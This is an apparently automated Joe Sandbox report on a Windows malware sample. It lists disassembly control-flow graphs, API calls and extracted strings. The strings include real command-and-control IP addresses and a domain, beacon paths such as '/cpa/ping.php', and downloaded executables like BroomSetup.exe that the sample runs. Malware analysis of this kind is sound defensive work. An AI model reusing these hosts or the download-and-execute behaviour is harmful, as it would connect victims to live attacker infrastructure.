                                                                                                                                                                                                                                                                                        control_flow_graph 0 424b3e-424eb5 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 426354 call 401b1e GetModuleFileNameA call 401b1e call 425ee2 call 401a0c call 403491 * 3 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c 129 424f07-425842 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42612f call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 14 call 40197c call 403491 * 12 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 0->129 130 424eb7 0->130 499 425e40-425eb7 call 4019f8 * 2 call 401ae8 call 4019f8 call 401ae8 call 401a11 call 401ae8 * 4 129->499 500 425848-425893 call 40b5a0 call 410c91 call 4262d2 call 426217 129->500 132 424ef2-424ef7 130->132 133 424ec1-424ec6 130->133 134 424ed6-424edb 130->134 135 424ee4-424ee9 130->135 136 424eeb-424ef0 130->136 137 424ec8-424ecd 130->137 138 424ef9 130->138 139 424ebe-424ebf 130->139 140 424ecf-424ed4 130->140 141 424edd-424ee2 130->141 142 424efe-424f02 call 401adf 132->142 133->142 134->142 135->142 136->142 137->142 138->142 139->142 140->142 141->142 142->129 517 425895-4258a7 call 
401b1e call 426260 500->517 518 4258af-425ac6 call 40ff7e call 403491 * 16 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 500->518 529 4258ac 517->529 613 425bcf-425db7 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 518->613 614 425acc-425ba6 call 40b5a0 call 403491 * 12 call 40197c call 42631a call 426217 518->614 529->518 729 425e2b-425e3b call 4019f8 * 2 613->729 730 425db9-425e02 call 40b5a0 call 410c91 call 4262d2 call 426217 613->730 680 425bc2-425bc9 call 40ff7e 614->680 681 425ba8-425bba call 401b1e call 426260 614->681 687 425bce 680->687 691 425bbf 681->691 687->613 691->680 729->499 742 425e04-425e16 call 401b1e call 426260 730->742 743 425e1e-425e25 call 40ff7e 730->743 749 425e1b 742->749 747 425e2a 743->747 747->729 749->743
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                                                                        • String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
                                                                                                                                                                                                                                                                                        • API String ID: 2531350358-4166474000
                                                                                                                                                                                                                                                                                        • Opcode ID: 4748807601ff07c0b267dde55d5161103cca83be6345b95c0a65a9138efbd89a
                                                                                                                                                                                                                                                                                        • Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4748807601ff07c0b267dde55d5161103cca83be6345b95c0a65a9138efbd89a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph: node 750 at 426504-427062 (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00426509
                                                                                                                                                                                                                                                                                        • SetThreadLocale.KERNEL32(00000000,0043CF38,?,185.172.128.90,00000000), ref: 0042715F
                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00427195
                                                                                                                                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
                                                                                                                                                                                                                                                                                        • WSACleanup.WS2_32 ref: 004271C5
                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(00000000), ref: 004271D9
                                                                                                                                                                                                                                                                                        • htons.WS2_32(?), ref: 0042720B
                                                                                                                                                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 0042721C
                                                                                                                                                                                                                                                                                        • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
                                                                                                                                                                                                                                                                                        • send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
                                                                                                                                                                                                                                                                                        • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
                                                                                                                                                                                                                                                                                        • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
                                                                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
                                                                                                                                                                                                                                                                                        • recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
                                                                                                                                                                                                                                                                                        • recv.WS2_32(00000000,?,?,00000000), ref: 00427540
                                                                                                                                                                                                                                                                                        • WSACleanup.WS2_32 ref: 0042757E
                                                                                                                                                                                                                                                                                        • closesocket.WS2_32(?), ref: 00427585
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: recv$Cleanupsend$H_prologLocaleStartupThreadclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                                        • String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                                                                                        • API String ID: 1963173973-3676584321
                                                                                                                                                                                                                                                                                        • Opcode ID: 44dfa501eee85b168214652f80630de655cf10f9296c47a00c0b463c29df297d
                                                                                                                                                                                                                                                                                        • Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44dfa501eee85b168214652f80630de655cf10f9296c47a00c0b463c29df297d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1695 4139e7-4139f3 call 4177fa 1698 413a15-413a21 call 413a6c ExitProcess 1695->1698 1699 4139f5-413a03 GetPEB 1695->1699 1699->1698 1701 413a05-413a0f GetCurrentProcess TerminateProcess 1699->1701 1701->1698
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
[Control-flow graph node and edge data omitted; API calls labelled in the graph: CreateToolhelp32Snapshot, Module32First]
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 042EE2C6
                                                                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 042EE2E6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 042ED000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_42ed000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
[Control-flow graph node and edge data omitted; API calls labelled in the graph: GetFileType, GetLastError, CloseHandle]
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A47F
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A486
                                                                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 0041A492
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A49C
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A4A5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041A4C5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0041A60F
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A641
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A648
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
[Control-flow graph node and edge data omitted; API calls labelled in the graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError]
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
[Control-flow graph node and edge data omitted; API calls labelled in the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA]
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0420024D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                        • Instruction ID: d8f387950e94e0f911890dd075781802a2d2187e6bf4e70d8d513a47c1733b33
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2526B74A11229DFDB64CF58D984BACBBB1BF09304F1480D9E54DAB392DB30AA85DF14
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00426134
                                                                                                                                                                                                                                                                                        • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
                                                                                                                                                                                                                                                                                        • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                                                                        • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                                                                        • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                                                                        • Opcode ID: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
                                                                                                                                                                                                                                                                                        • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                                                                        • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                                                                        • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                                                                        • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 490808831-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                                                                        • Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1678 419767-41977f call 41e97a 1681 419781-419786 call 412381 1678->1681 1682 419792-4197a8 SetFilePointerEx 1678->1682 1689 41978c-419790 1681->1689 1684 4197b9-4197c3 1682->1684 1685 4197aa-4197b7 GetLastError call 41234b 1682->1685 1688 4197c5-4197da 1684->1688 1684->1689 1685->1689 1690 4197df-4197e4 1688->1690 1689->1690
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1692 426217-42623c CreateFileA 1693 426259-42625f 1692->1693 1694 42623e-426253 WriteFile FindCloseChangeNotification 1692->1694 1694->1693
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3805958096-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1703 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1712 401c51-401c61 1703->1712 1713 401c23-401c47 1703->1713 1713->1712 1714 401c49-401c4c call 40187f 1713->1714 1714->1712
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: v*@
                                                                                                                                                                                                                                                                                        • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                                                                        Memory Dump Source
